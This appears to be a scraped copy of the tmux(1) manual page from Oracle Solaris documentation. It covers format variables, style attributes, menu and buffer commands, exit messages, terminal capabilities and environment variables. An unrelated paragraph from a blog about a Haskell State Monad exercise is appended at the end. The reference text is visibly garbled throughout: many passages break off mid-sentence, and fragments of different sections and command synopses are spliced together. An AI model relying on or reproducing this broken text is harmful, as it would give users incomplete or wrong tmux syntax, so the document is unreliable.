origin_flag Pane origin pane_height Height of pane pane_id #D Unique pane ID pane_in_mode 1 if pane is in a mode pane_index #P Index of pane pane_input_off 1 if input to pane is disabled pane_left Left of pane pane_marked 1 if this is the marked pane pane_marked_set 1 if a marked pane is set pane_mode Name of pane mode, if any pane_path #T Path of pane (can be set by application) pane_pid PID of first process in pane pane_pipe 1 if pane is being piped pane_right Right of pane pane_search_string Last search string in copy mode pane_start_command Command pane started with pane_synchronized 1 if pane is synchronized pane_tabs Pane tab positions pane_title #T Title of pane (can be set by application) pane_top Top of pane pane_tty Pseudo terminal of pane pane_width Width of pane pid Server PID rectangle_toggle 1 if rectangle selection is activated scroll_position Scroll position in copy mode scroll_region_lower Bottom of scroll region in pane scroll_region_upper Top of scroll region in pane selection_active 1 if selection started and changes with the cursor in copy mode selection_end_x X position of the end of the selection selection_end_y Y position of the end of the selection selection_present 1 if selection started in copy mode selection_start_x X position of the start of the selection selection_start_y Y position of the start of the selection session_activity Time of session last activity session_alerts List of window indexes with alerts session_attached Number of clients session is attached to session_attached_list List of clients session is attached to session_created Time session created session_format 1 if format is for a session session_group Name of session group session_group_attached Number of clients sessions in group are attached to session_group_attached_list List of clients sessions in group are attached to session_group_list List of sessions in group session_group_many_attached 1 if multiple clients attached to sessions in group session_group_size Size of session group session_grouped 1 if session in a group session_id Unique session ID session_last_attached Time session last attached session_many_attached 1 if multiple clients attached session_name #S Name of session session_stack Window indexes in most recent order session_windows Number of windows in session socket_path Server socket path start_time Server start time version Server version window_active 1 if window active window_active_clients Number of clients viewing this window window_active_clients_list List of clients viewing this window window_active_sessions Number of sessions on which this window is active window_active_sessions_list List of sessions on which this window is active window_activity Time of window last activity window_activity_flag 1 if window has activity window_bell_flag 1 if window has bell window_bigger 1 if window is larger than client window_cell_height Height of each cell in pixels window_cell_width Width of each cell in pixels window_end_flag 1 if window has the highest index window_flags #F Window flags window_format 1 if format is for a window window_height Height of window window_id Unique window ID window_index #I Index of window window_last_flag 1 if window is the last used window_layout Window layout description, ignoring zoomed window panes window_linked 1 if window is linked across sessions window_linked_sessions Number of sessions this window is linked to window_linked_sessions_list List of sessions this window is linked to window_marked_flag 1 if window contains the marked pane window_name #W Name of window window_offset_x X offset into window if larger than client window_offset_y Y offset into window if larger than client window_panes Number of panes in window window_silence_flag 1 if window has silence alert window_stack_index Index in session most recent stack window_start_flag 1 if window has the lowest index window_visible_layout Window layout description, respecting zoomed window panes window_width Width of window window_zoomed_flag 1 if window is zoomed wrap_flag Pane wrap flag STYLES tmux offers various options to specify the colour and attributes of aspects of the interface, for example status-style for the status line. In addition, embedded styles may be specified in format options, such as status-left, by enclosing them in `#[' and `]'. A style may be the single term `default' to specify the default style (which may come from an option, for example status-style in the status line) or a space or comma separated list of the following: fg=colour Set the foreground colour. The colour is one of: black, red, green, yellow, blue, magenta, cyan, white; if supported the bright variants brightred, brightgreen, brightyellow; colour0 to colour255 from the 256-colour set; default for the default colour; terminal for the terminal default colour; or a hexadeci- mal RGB string such as `#ffffff'. bg=colour Set the background colour. none Set no attributes (turn off any active attributes). bright (or bold), dim, underscore, blink, reverse, hidden, italics, overline, strikethrough, double-underscore, curly-underscore, dotted-underscore, dashed-underscore Set an attribute. Any of the attributes may be prefixed with `no' to unset. align=left (or noalign), align=centre, align=right Align text to the left, centre or right of the available space if appropriate. fill=colour Fill the available space with a background colour if appropriate. list=on, list=focus, list=left-marker, list=right-marker, nolist Mark the position of the various window list components in the status-format option: list=on marks the start of the list; list=focus is the part of the list that should be kept in focus if the entire list won't fit in the available space (typically the current window); list=left-marker and list=right-marker mark the text to be used to mark that text has been trimmed from the left or right of the list if there is not enough space. push-default, pop-default Store the current colours and attributes as the default or reset to the previous default. A push-default affects any subsequent use of the default term until a pop-default. Only one default may be pushed (each push-default replaces the previous saved default). range=left, range=right, range=window|X, norange Mark a range in the status-format option. range=left and range=right are the text used for the `StatusLeft' and `StatusRight' mouse keys. range=window|X is the range for a win- dow passed to the `Status' mouse key, where `X' is a window index. Examples are: fg=yellow bold underscore blink bg=black,fg=default,noreverse using an escape sequence (like it would set the xterm(1) window title in X(7)). (if the allow-rename option is turned on): $ title setting escape sequence, for example: $ printf '\033]2;My Title\033\\' It can also be modified with the select-pane -T command. GLOBAL AND SESSION and one line in height (it may be disabled or made multiple lines with the status session option) and con- tains, from left-to-right: the name of the current session in square brackets; the window list; the title of the active pane in double quotes; and the time and date. Each line of the status line is configured with the status-format option. The default activity is monitored and activity has been detected. ! Window bells are monitored and silence) is present. The colour and attributes of the status line may be configured, the entire [-1ikN] [. Before the command is executed, the first occurrence of the string `%%' and all occurrences of `%1' are replaced by the response to the first prompt, all `%2' are replaced with the response to the second prompt, and so on for further prompts. Up to nine prompt responses may be replaced (`%1' to `%9'). `%%%' is like `%%' but any quotation marks are escaped. -1 makes the prompt only accept one key press, in this case the resulting input is a single character. -k is like -1 but the key press is translated to a key name. -N makes the prompt only accept numeric key presses. -i executes the command every time the prompt input changes instead of when the user exits the com- mand prompt. The following keys have a special meaning in the command prompt, depending on the value of the status-keys option: Function vi emacs Cancel command prompt Escape Escape Delete from cursor to start of-menu [-c target-client] [-t target-pane] [-T title] [-x position] [-y position] name key command ... (alias: menu) com- mand are formats, see the FORMATS and STYLES sections. If the name begins with a hyphen (-), then the item is disabled (shown dim) and may not be chosen. The name may be empty for a separa- tor line, in which case both the key and command should be omit- ted. -T is a format for the menu title (see FORMATS). -x and -y give the position of the menu. Both may be a row or column number, or one of the following special values: Value Flag Meaning R -x The right side of the terminal P Both The bottom left of the pane M Both The mouse position W -x The window position on the status line S -y The line above or below the status line Each menu consists of items followed by a key shortcut shown in brackets. If the menu is too large to fit on the terminal, it is not displayed. Pressing the key shortcut chooses the correspond- ing item. If the mouse is enabled and the menu is opened from a mouse key binding, releasing the mouse button with an item selected will choose that item. The following keys are also available: Key Function Enter Choose selected item Up Select previous item Down Select next item q Exit menu display-message [-aIpv] [. -v prints verbose logging as the format is parsed and -a lists the format variables and their values. -I forwards any input read from stdin to the empty pane given by target-pane.: choose-buffer [-NZr] [-F format] [-f filter] [-O sort-order] [-t target-pane] [template] Put a pane into buffer mode, where a buffer may be chosen inter- actively field r Reverse sort order v Toggle preview q Exit mode After a buffer is chosen, `%%' is replaced by the buffer name in template and the result executed as a command. If template is not given, "paste-buffer -b '%%'" is used. -O specifies the initial sort field: one of `time', `name' or `size'. list. -N starts without the preview. This command works only if at least one client is attached. default carriage return (CR). A custom separator may be speci- fied using the -s flag. The -r flag means to do no replacement (equivalent to a separator of LF). If -p is specified, paste bracket control codes are inserted around the buffer if the application renames, including. EXIT MESSAGES When a tmux client detaches, it prints a message. This may be one of: [detached (from session ...)] The client was detached normally. [detached and SIGHUP] The client was detached and its parent sent the SIGHUP signal (for example with detach-client -P). [lost tty] The client's tty(4) or pty(4) was unexpectedly destroyed. [terminated] The client was killed with SIGTERM. [exited] The server exited when it had no sessions. [server exited] The server exited when it received SIGTERM. [server exited unexpectedly] The server crashed or otherwise exited without telling the client the reason.\\' Smol Enable the overline attribute. The capability is usually SGR 53 and can be added to terminal-overrides as: Smol=\E[53m Smulx Set a styled underscore. The single parameter is one of: 0 for no underscore, 1 for normal underscore, 2 for double underscore, 3 for curly underscore, 4 for dotted underscore and 5 for dashed underscore. The capability can typically be added to terminal-overrides as: Smulx=\E[4::%p1%dm Setulc Set the underscore colour. The argument is (red * 65536) + (green * 256) + blue where each is between 0 and 255. The capa- bility can typically be added to terminal-overrides as: Setulc=\E[58::2::%p1%{65536}%/%d::%p1%{256}%/%{255}%&%d::%p1%{255}%&%d%;m escape sequence (for example, \e[38;2;255;255;255m). If supported, this is used for the initialize colour escape sequence (which may be enabled by adding the `initc' and `ccc' capabilities to the tmux terminfo(5) entry).. . %pane-mode-changed pane-id The pane with ID pane-id has changed mode. %session-changed session-id name The client is now attached to the session with ID session-id, which is named name. %session-renamed name The current session was renamed to name. %session-window-changed session-id window-id The session with ID session-id changed its active window to the window with ID window-id. -pane-changed window-id pane-id The active pane in the window with ID window-id changed to the pane with ID pane-id. %window-renamed window-id name The window with ID window-id was renamed to name. ENVIRONMENT When tmux is started, it inspects the following environment variables: EDITOR If the command specified in this variable contains the string `vi' and VISUAL is unset, use vi-style key bindings. Overrid- den by the mode-keys and status-keys options. HOME The user's login directory. If unset, the passwd(5) database is consulted. LC_CTYPE The character encoding locale(1). It is used for two separate purposes. For output to the terminal, UTF-8 is used if the -u option is given or if LC_CTYPE contains "UTF-8" or "UTF8". Otherwise, only ASCII characters are written and non-ASCII characters are replaced with underscores (`_'). For input, tmux always runs with a UTF-8 locale. If en_US.UTF-8 is pro- vided by the operating system it is used and LC_CTYPE is ignored for input. Otherwise, LC_CTYPE tells tmux what the UTF-8 locale is called on the current system. If the locale specified by LC_CTYPE is not available or is not a UTF-8 locale, tmux exits with an error message. LC_TIME The date and time format locale(1). It is used for locale- dependent strftime(3) format specifiers. PWD The current working directory to be set in the global environ- ment. This may be useful if it contains symbolic links. If the value of the variable does not match the current working directory, the variable is ignored and the result of getcwd(3) is used instead. SHELL The absolute path to the default shell for new windows. See the default-shell option for details. TMUX_TMPDIR The parent directory of the directory containing the server sockets. See the -L option for details. VISUAL If the command specified in this variable contains the string `vi', use vi-style key bindings. Overridden by the mode-keys and status-keys options.'" ATTRIBUTES See attributes(7) for descriptions of the following attributes: +---------------+------------------+ |ATTRIBUTE TYPE | ATTRIBUTE VALUE | +---------------+------------------+ |Availability | terminal/tmux | +---------------+------------------+ |Stability | Uncommitted | +---------------+------------------+ SEE ALSO pty(4) AUTHORS Nicholas Marriott <nicholas.marriott@gmail.com> NOTES Source code for open source software components in Oracle Solaris can be found at- downloads.html. This software was built from source available at- cle/solaris-userland. The original community source was downloaded from. Further information about this software can be found on the open source community website at. BSD February 9, 2022 BSD
|
https://docs.oracle.com/cd/E88353_01/html/E37839/tmux-1.html
|
CC-MAIN-2022-33
|
refinedweb
| 9,876
| 61.56
|
Opened 14 years ago
Closed 10 years ago
Last modified 10 years ago
#1142 closed enhancement (fixed)
Support for multiple database connections
Description
Django currently assumes that all models will be stored in a single database, and that only one database connection will be used for the duration of a request. This assumption does not scale to really large applications, where it is common for multiple database connections to be used in non-obvious ways.
Three examples include:
- Traditional replication, where all writes go to a single master database while reads are distributed across a number of slave databases.
- Sharding, where (for example) user accounts 1-1000 live on db1, 1001-2000 live on db2 etc.
- Different types of data live on different servers / clusters. Frequently accessed user profile data might be stored on a seperate database/cluster from log data which is frequently written but very rarely accessed.
At the very least, Django needs to allow more than one database connection to be maintained by the DB wrapper. The default should still be a single connection as this is the common case, but Django should not get in the way should multiple connections be desired.
Rather than having a single connection, how about maintaining a dictionary of connections? A "default" key could correspond to the connection that is used in most cases, but other connections can be configured in the settings file and assigned names. There would need to be a mechanism somewhere for Django model classes to be told which named connection they should use.
Simple replication may end up being a different issue entirely - it's possible that could be handled just with a custom DB backend that knows to send writes to one server and distribute reads across several others. The above change (where Django allows multiple DB connections) is still essential for more complex configurations.
More about this on the mailing list:
Attachments (1)
Change History (81)
comment:1 Changed 14 years ago by
comment:2 Changed 14 years ago by
My limited experience with really large apps suggests that handling clustering at a lower level won't provide enough flexibility. For huge sites you end up having to take different scaling approaches for different bits of functionality - you might have one web service call (or RSS feed) that is hit more than anything else and needs to be scaled in a different way for example. You end up needing to scale different parts of the application in different ways, often using different databases for different parts of the app.
There are also other use-cases for multiple database connections outside of scaling - talking to two legacy applications at once for example.
comment:3 Changed 14 years ago by
Django may benefit from the ability to define connections at the application level that can override the sitewide setting. This would make it rather trivial to pull data in from multiple platforms.
An interface to SQLrelay () might help the scalability issue.
comment:4 Changed 14 years ago by
Simon,
Per your recommendation here I'm just adding a brief description of the scenario in which we typically encounter this current limitation of Django:
In a mixed-database environment, We're typically faced with having to model data types hosted on different database servers. For example, web content may generally live on our MySQL servers, but some applications will need to incorporate invoice data from a MS SQL database. While it's certainly a general mess to have data spread out over multiple engines like this, I think it's also a fact that many developers (especially in small-medium corporate environments) are faced with, and not having the ability to easily manage data from different source within a Django app is going to be a serious limitation to these people.
The solutions of either being able to define a dictionary of database connections in the sitewide config file or being able to specify database connections on an application level, could both work well. I wonder, though, what exactly would be entailed in defining connections on the application level? Would applications generally be able to add their own settings file in which sitewide preferences could be overwritten, or would there be a specific module, like myapp.db.connections for specifying app-level connections? Maybe the simplest and most backward-compatible approach would be to keep a dictionary of named connections available to installed apps in the sitewide settings file as originally suggested.
Thanks. /Morten
comment:5 Changed 13 years ago by
comment:6 Changed 13 years ago by
I would have to agree that this is a serious limitation.
It is not always possible to restructure existing databases into a single database for use and it would be of great valu to be able to use the django database model to integrate multiple databases at some level.
comment:7 Changed 13 years ago by
comment:8 Changed 13 years ago by
comment:9 Changed 13 years ago by
(In [3198]) Created branch for MultipleDatabaseSupport. Refs #1142.
What is current status of this? When can we expect to see this in trunk?
thanks,
Forest
comment:18 Changed 13 years ago by
comment:19 Changed 13 years ago by
comment:20 Changed 13 years ago by
Has there been any progress on this feature? I am in a similar situation. My project needs to be able to query different databases for different pieces of data. Another suggestion would be to be able to over ride the connection settings at the app level.
comment:21 Changed 13 years ago by
reverted metadata spam.
comment:22 Changed 13 years ago by
comment:23 Changed 13 years ago by
I hope this gets merged into the trunk soon.
comment:24 Changed 13 years ago by
Is multiple database support going to implemented?
At least in my case, I was looking at Django for an application for my company, but it will need to access at least 2 databases. The main one, plus a database from another product over which we have no control and can't change.
We would actually like it to be 3 databases with the 3rd one being for reporting data. We prefer to keep reporting data in a separate database for performance purposes and for scalability, but if absolutely necessary, we would put it in the dsame database as the main data. That still leaves us with at least 2 databases.
We have another app that was done in Java with Hibernate and Hibernate is currently accessing 4 databases from within the same app.
comment:25 Changed 13 years ago by
According to MultipleDatabaseSupport, the branch is feature complete and seems to be only lacking documentation.
If anyone is using or has tested the multi db branch, please note your experiences here.
Marking patch needs improvement since the latest commit to the branch notes that tests are still failing.
comment:26 Changed 13 years ago by
Question: Does the patch for this also provide a work-around for keeping the native Django apps tables out of your database?
comment:27 Changed 13 years ago by
Changed 13 years ago by
Fixes mulitple-db-support branch django/db/models/manager.py for Python 2.3
comment:28 Changed 13 years ago by
It's been a long time since something has happened to this branch.. will it ever get included in the main trunk?
I wish to use this, but i want to stay with the current Django code. Is it possible to check-out the trunk and merge the changes from this branch?
comment:29 Changed 13 years ago by
oops, reverting the hash patch flag i removed
comment:30 Changed 13 years ago by
Please post question like comment 28 to the users list, not this ticket. Ticket comments are for resolving the issue at hand, not seeking genera. information.
comment:31 Changed 12 years ago by
Hi there, I have been following this conversation. I am working with some friends on a research project that requires one, maybe several postgres dbs. It is a bit off-label, but were hoping to make use of some of the Django features.
Multiple Dbs is something long-term we might need. Can someone tell me how to install this patch? I am running latest Django code with Python 2.4
So far, I see some patch online with about four lines of code... My Python skills are somewhere around early intermediate.. so I am not sure if :
- if just placing that code in my latest subversion checkout (where the surrounding code looks a bit different than what is there).. constitutes an installation of this patch.
and
- how can I use it?
Appreciate your patience and assistance.
Robert
comment:32 Changed 12 years ago by
comment:33 Changed 12 years ago by
comment:35 Changed 12 years ago by
Reverted spam.
comment:36 Changed 12 years ago by
comment:37 Changed 12 years ago by
comment:38 Changed 12 years ago by
comment:39 Changed 12 years ago by
comment:40 Changed 12 years ago by
comment:41 Changed 12 years ago by
comment:42 Changed 12 years ago by
I reviewed an API design with Jacob and Adrian (and others) and will now work on a prototype. Much of the credit for the API goes to Ben Ford (and his code should give me a big headstart).
comment:43 follow-up: 44 Changed 12 years ago by
I'm glad to see someone taking this ticket, it's something I've wanted for a long time. Any chance you can write up your planned API?
comment:44 Changed 12
comment:52 Changed 11 years ago by
Ben Ford set up a mercurial repository for new work on multiple databases at. A track setup is available at.
comment:53 Changed 11 years ago by
See this django-developers thread for more discussion (including my API proposal):
comment:54 Changed 11 years ago by
Not in scope for 1.0.
comment:55 Changed 11 years ago by
comment:56 Changed 11 years ago by
comment:57 Changed 11 years ago by
What is the current status on this issue? There doesn't appear to have been any visible movement in several months now, and this is something which would be very useful in a project I'm working on. I have a slightly different use case than the previously mentioned ones, however... and I'm sure it's not an entirely common one, but perhaps something to take into consideration.
The company I work for is sitting on a fairly large data warehouse for a number of clients. Each client has their own database, with a common schema, on one of two MS SQL 2k servers. In the near future, we will hopefully be moving some of these clients onto a PostgreSQL server (and in the distant future, it would be nice to move towards Greenplum; although that should be transparent with psycopg2, afaik). In addition, there is a separate database already running on the PostgreSQL server, which stores configuration parameters and which I am using for the Django system tables.
On every page load, I need Django to connect to database 'A' on the PostgreSQL server for any Django specific operations, then connect to an arbitrary database on either of the MS SQL servers, depending on which of our clients' data is currently being viewed. From what I've seen so far in the discussion in this ticket and on MultipleDatabaseSupport, this doesn't sound like it would likely be a supported scenario, as the connection to be used is determined dynamically, rather than a static connection chosen per model. In my case, all models apply across all database connections.
Now, I have made this work thus far with my own connection manager () but using it is somewhat kludgy and I'm sure it's far from a full implementation. I also had to apply a hack () to django-pyodbc and apply a pending patch (#6710) to Django in order to get it to work. Here is an example of why it in use:
comment:58 Changed 11 years ago by
There has, in fact, been lots of activity. Perhaps you might wish to peruse the archives of django-developers, which is where design work takes place. This ticket is really just a placeholder that will be closed when we commit some kind of final solution (and possibly for patches as we get closer if the work is self-contained enough not to require a branch).
comment:59 Changed 11 years ago by
comment:60 Changed 11 years ago by
comment:61 Changed 11 years ago by
Milestone post-1.0 deleted
comment:62 Changed 11 years ago by
comment:63 Changed 11 years ago by
My look is
# Wrapper classes from re import compile class Db: def __init__(self, cstr): self.link = None __re_dbstr = compile(r'^(?P<engine>[^:]+)://((?P<user>[^\(:]+)(\((?P<role>.+)\))?(:(?P<password>[^@]+))?(@(?P<host>[^\/:]+)(:(?P<port>\d+))?)?)?/(?P<name>.+)') try: self.__db = __re_dbstr.search(cstr).groupdict() # Fix for sqlite if self.__db['engine'].startswith('sqlite'): self.__db['name'] = "/%s" % self.__db['name'] except: self.__db = {} raise Exception("#1") self.connect() def connect(self): self.link = 'Connection link' # .... def keys(self): return self.__db.keys() def items(self): return self.__db.items() def __getitem__(self, key): return self.__db.get(key, None) def __getattr__(self, key): return self.__db.get(key, None) class DbPool: def __init__(self): self.__dbs = {} self.__default = None def __getitem__(self, db_alias): if db_alias not in self.__dbs: raise Exception('#2') return self.__dbs[db_alias] def __getattr__(self, key): if not self.__default: raise Exception('#3') return self.__dbs[ self.__default ].__getattr__(key) def add(self, db_alias, db_str): self.__dbs[db_alias] = Db(db_str) if self.__default: return self.set_default(db_alias) def get_default(self): return self.__default def set_default(self, dbAlias): if dbAlias in self.__dbs: self.__default = dbAlias else: raise Exception("#4") # Settings DATABASES = { 'alpha': 'sqlite3:///:memory:', 'beta': 'sqlite3:///tmp/django.sqlite3', 'gamma': 'mysql://user1/django', 'delta': 'mysql://user1:password1/django', 'default': 'mysql://user1:password1@host1/django', 'reserv1': 'mysql://user1:password1@host1:1234/django', 'reserv2': 'postgresql://user1(role1):password1@host1/django', 'etc': 'postgresql://user1(role1):password1@host1:1234/django', } DATABASE_DEFAULT = 'default' DATABASE_OPTIONS = {} DATABASE_OPTIONS['etc'] = { 'ssl':'...' } # Setting handlers pool = DbPool() for dbase in DATABASES.items(): pool.add(*dbase) pool.set_default(DATABASE_DEFAULT) # Default database print pool.engine, pool.host, pool.name # Some other db print pool['etc'].engine, pool['etc'].host, pool['etc'].name # Models class SomeModel(): # If not defined # meta_connections = [DATABASE_DEFAULT] meta_connections = ['alpha', 'beta'] # API # instead # from django.db import connection # connection.cursor() # # use # from django.db import pool # pool.link.cursor() # pool['etc'].link.cursor()
comment:64 Changed 10 years ago by
This ticket is accepted as a part of the 2009 GSOC.
comment:65 Changed 10 years ago by
I made a Multiple database manager for django-blocks see:
just need to do something like this to your model:
from django.db import models from blocks.apps.core.managers import MultiDBManager class SomeModel(models.Model): code = models.IntegerField(primary_key=True) name = models.CharField(max_length=250) objects = MultiDBManager() class Meta: db_name = 'oracle'
comment:66 follow-up: 72 Changed 10 years ago by
comment:67 Changed 10 years ago by
comment:68 Changed 10 years ago by
comment:69 Changed 10 years ago by
comment:70 Changed 10 years ago by
comment:71 Changed 10 years ago by
comment:72 follow-up: 73 Changed 10 years ago by
Replying to alexkoshelev:
I've implemented this on a development version of django 1.1. It appears as though it appends the table name of the app in the database established in the project settings instead of adding the model's tables to the declared database
from django.db import models from django.blocks.apps.core.managers import MultiDBManager class FireMap(models.Model): address = models.CharField(max_length=100) city = models.CharField(max_length=50) zip = models.IntegerField() latitude = models.DecimalField(max_digits=17, decimal_places=14) longitude = models.DecimalField(max_digits=17, decimal_places=14) neighborhood = models.CharField(max_length=30) assesorID = models.IntegerField() assessorURL = models.URLField() homeValue = models.CommaSeparatedIntegerField(max_length=8) homeOwner = models.CharField (max_length=30) mainIMGURL = models.URLField() photos = models.CommaSeparatedIntegerField(max_length=40) articleID1 = models.IntegerField() articleID2 = models.IntegerField() articleID3 = models.IntegerField() extrainfo = models.TextField() objects = MultiDBManager() def __str__(self): return self.name class Meta: db_name = 'firemap'
the setting for the Db in my project settings file is set to:
DATABASE_ENGINE = 'postgresql_psycopg2' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'. DATABASE_NAME = 'newsok' # Or path to database file if using sqlite3.
When the tables are created I see in the newsok Db a firemap_firemap table (firemap is the name of the app as well) but there is nothing in the actual firemap Db.
I apologize if this isn't the place to report this issue. I am new around here and to django in general.
comment:73 Changed 10 years ago by
Replying to alexkoshelev:
I've implemented this on a development version of django 1.1.
...
I apologize if this isn't the place to report this issue. I am new around here and to django in general.
Nick - as noted in comment 64, Multiple database connections was the subject of a 2009 Google Summer of Code project. Alex Gaynor has been developing the code to implement this. It's not a minor change - it requires lots of changes throughout Django. Check out Alex's GitHub repository if you want to see the progress he has made. It isn't quite ready for trunk yet, but it's getting close, and it's sufficiently functional that you can try it out.
comment:74 Changed 10 years ago by
If you want to see the current state of work please use my branch in soc2009/multidb in the Django repository, right now my GitHub repo is undergoing severe code alterations that make it high unstable.
comment:75 Changed 10 years ago by
comment:76 Changed 10 years ago by
comment:77 Changed 10 years ago by
comment:78 Changed 10 years ago by
comment:79 Changed 10 years ago by
comment:80 Changed 10 years ago by
I know posts should be focused on ticket problems or solutions, but I can't help myself.
thank you so much! what a great Christmas gift!
An Alternative to this would be to use something like CJDBC/Sequoia () and manage the clustering at a lower level to django itself.
the link is for a JDBC wrapper, but they also have a C++ library which might be useful. all that is needed is a python module ;-)
regards
Ian
|
https://code.djangoproject.com/ticket/1142
|
CC-MAIN-2019-39
|
refinedweb
| 3,100
| 55.13
|
System test framework over POSIX shells
Project description
Prego is a system/integration test framework running as Python unittest testcases.
Prego is a library consisting on a set of clases and hamcrest matchers usefull to specify shell command interactions through files, environment variables, network ports. It provides support to run shell commands on background, send signal to processes, set assertions on command stdout or stderr, etc.
Concepts
First: a Task() is a set of assertions.
Three assertion checkers are available:
- task.assert_that, for single shot checking.
- task.wait_that, for polling recurrent checking.
- task.command, to run arbitrary shell command.
Subjects (and their associated assertions):
- Task(desc=’‘, detach=False)
- command(cmd_line, stdout, stderr, expected, timeout, signal, cwd, env)
- running()
- terminated()
- File(path)
- exists()
- File().content
- any hamcrest string matchers (ie: contains_string)
- Variable
- exists()
- any hamcrest string matchers (ie: contains_string)
- Command
- running()
- exits_with(value)
- killed_by(signal)
- Host(hostname)
- listen_port(number, proto=’tcp’)
- reachable()
Execution model
command
context
The context is an object whose attributes may be automatically interpolated in command and filename paths.
Some of them are set as default values for command() parameters too. If context.cwd is set, all commands in the same test method will use that value as CWD (Current Working Directory) unless you define a different value as command() keyarg.
Context attributes that defaults command() parameters are cwd, timeout, signal and expected.
Interpolation
Available interpolation variables are:
- $basedir: the directory where prego is executed (relative).
- $fullbasedir: absolute path of $basedir.
- $testdir: the directory where the running test file is.
- $fulltestdir: absolute path of $testdir.
- $testfilename: the file name of the running test.
- $tmpbase: a safe directory (per user) to put temporary files.
- $tmp: a safe directory (per user and prego instance) to put temporary files.
- $pid: the prego instance PID.
Examples
Testing ncat
import hamcrest from prego import Task, TestCase, context as ctx, running from prego.net import localhost, listen_port from prego.debian import Package, installed class Net(TestCase): def test_netcat(self): ctx.port = 2000 server = Task(desc='ncat server', detach=True) server.assert_that(Package('nmap'), installed()) server.assert_that(localhost, hamcrest.is_not(listen_port(ctx.port))) cmd = server.command('ncat -l -p $port') server.assert_that(cmd.stdout.content, hamcrest.contains_string('bye')) client = Task(desc='ncat client') client.wait_that(server, running()) client.wait_that(localhost, listen_port(ctx.port)) client.command('ncat -c "echo bye" localhost $port')
This test may be executed using nosetest:
$ nosetests examples/netcat.py . ---------------------------------------------------------------------- Ran 1 test in 1.414s OK
But prego provides a wrapper (the prego command) that has some interesting options:
$ prego -h usage: prego [-h] [-c FILE] [-k] [-d] [-o] [-e] [-v] [-p] ... positional arguments: nose-args optional arguments: -h, --help show this help message and exit -c FILE, --config FILE explicit config file -k, --keep-going continue even with failed assertion or tests -d, --dirty do not remove generated files -o, --stdout print tests stdout -e, --stderr print tests stderr -v, --verbose increase log verbosity
Same ncat test invoking prego:
[II] ------ Net.test_netcat BEGIN [II] [ ok ] B.0 wait that A is running [II] [ ok ] A.0 assert that nmap package is installed [II] [ ok ] A.1 assert that localhost not port 2000/tcp to be open [II] [fail] B.1 wait that localhost port 2000/tcp to be open [II] [ ok ] B.1 wait that localhost port 2000/tcp to be open [II] A.2.out| bye [II] [ ok ] B.2 Command 'ncat -c "echo bye" localhost 2000' code (0:0) time 5:1.28 [II] [ ok ] B.3 assert that command B.2 returncode to be 0 [II] [ ok ] B.4 assert that command B.2 execution time to be a value less than <5>s [II] [ OK ] B Task end - elapsed: 1.17s [II] [ ok ] A.2 Command 'ncat -l -p 2000' code (0:0) time 5:1.33 [II] [ ok ] A.3 assert that command A.2 returncode to be 0 [II] [ ok ] A.4 assert that command A.2 execution time to be a value less than <5>s [II] [ ok ] A.5 assert that File '/tmp/prego-david/26245/A.2.out' content a string containing 'bye' [II] [ OK ] A Task end - elapsed: 1.32s [II] [ OK ] Net.test_netcat END ---------------------------------------------------------------------- Ran 1 test in 1.396s OK
Testing google.com reachability
import hamcrest from prego import TestCase, Task from prego.net import Host, reachable class GoogleTest(TestCase): def test_is_reachable(self): link = Task(desc="Is interface link up?") link.command('ip link | grep wlan0 | grep "state UP"') router = Task(desc="Is the local router reachable?") router.command("ping -c2 $(ip route | grep ^default | cut -d' ' -f 3)") for line in file('/etc/resolv.conf'): if line.startswith('nameserver'): server = line.split()[1] test = Task(desc="Is DNS server {0} reachable?".format(server)) test.command('ping -c 2 {0}'.format(server)) resolve = Task(desc="may google name be resolved?") resolve.command('host') ping = Task(desc="Is google reachable?") ping.command('ping -c 1') ping.assert_that(Host(''), reachable()) ping.assert_that(Host(''), hamcrest.is_not(reachable())) web = Task(desc="get index.html") cmd = web.command('wget -O-') web.assert_that(cmd.stdout.content, hamcrest.contains_string('value="I\'m Feeling Lucky"'))
Project details
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/prego3/0.20181031/
|
CC-MAIN-2019-51
|
refinedweb
| 875
| 53.37
|
In this article, we learn how to create PDF files using iTextPDF’s Java library. This tutorial includes Video guide that explains how to add iTextPDF library to your eclipse project. And later you learn how to use this in order to create a PDF file. If you prefer text instructions then keep reading. If you prefer to watch video then take a look at the video below.
Let’s start the tutorial with Installation of iText.
Installation
- Go to iText PDF library files.
- Extract the content of zip file.
- Create a folder and copy the contents of zip folder.
- Open Eclipse IDE.
- Create a new Java project.
- Add the itext jar files in class path.
- Finish the project creation wizard.
- That’s it.
Once you have created the Eclipse Java project and added itext jar files. Next step is to focus on the code. Here we have to create a document. After creating a document we have to push the content inside the document. This helps us to properly format before exporting that document to PDF format. So let’s see how this can be done with the code. Check out the code below.
import java.io.FileOutputStream;
import java.io.FileNotFoundException;
import com.itextpdf.text.Document;
import com.itextpdf.text.DocumentException;
import com.itextpdf.text.Paragraph;
import com.itextpdf.text.pdf.PdfWriter;
public class Demo
{
public static void main(String[] args)
{
Document document = new Document();
try
{
PdfWriter writer = PdfWriter.getInstance(document, new FileOutputStream(“demo.pdf”));
document.open();
document.add(new Paragraph(“This is Demo PDF”));
document.close();
writer.close();
} catch (DocumentException e)
{
e.printStackTrace();
} catch (FileNotFoundException e)
{
e.printStackTrace();
}
}
}
Code: In first statement, we have created pdfwriter instance and created pdf document. In second statement we have opened the created document. In next statement we have added the content inside the pdf document. And finally we closed the document. We have placed this code inside try and catch block to avoid file exceptions.
You can copy the code given above and paste it inside your Eclipse project class. Just watch out with the classname in this code, and change it to your project’s classname. Make that change and any other change in the output that you want. Now the next step is to run the code.
When you run the code, eclipse tries to export the PDF using iText. And the file is stored in the same folder to that of the project files. This was just an example. And there are many other things that can you do with the document. You can format it for the table. Alternatively you can use it to export the database tables to the PDF document. There are styles that you can apply to the document. In this case however I suggest you to check out the documentation of the iText PDF library. In future I may cover some of the examples for the iText library that may include styling and the form handling along with the database export options.
If you like this short tutorial, then do let me know. Also check out the video above to see the code in action.Don’t forget to share the article with your friends on social media. If you have any questions or suggestions regarding the video or the code, then do let me know. 🙂
|
http://onecore.net/create-pdf-files-in-java-using-itext-pdf-library.htm
|
CC-MAIN-2017-09
|
refinedweb
| 554
| 78.35
|
While looking for more real world example in order to complete a previous blog entry, I found myself struggling with the State Monad in order to solve what I supposed to be a typical State Monad problem.
My rambling to solve this specific problem did not succeed while in the mean time I successfully reproduced the canonical sample of a stack manipulation extracted from Learn You a Haskell (LYAH). Although I am not satisfied with the result I would like to expose this "kata", and will ask for your feedback in order to reach to the expected goal.
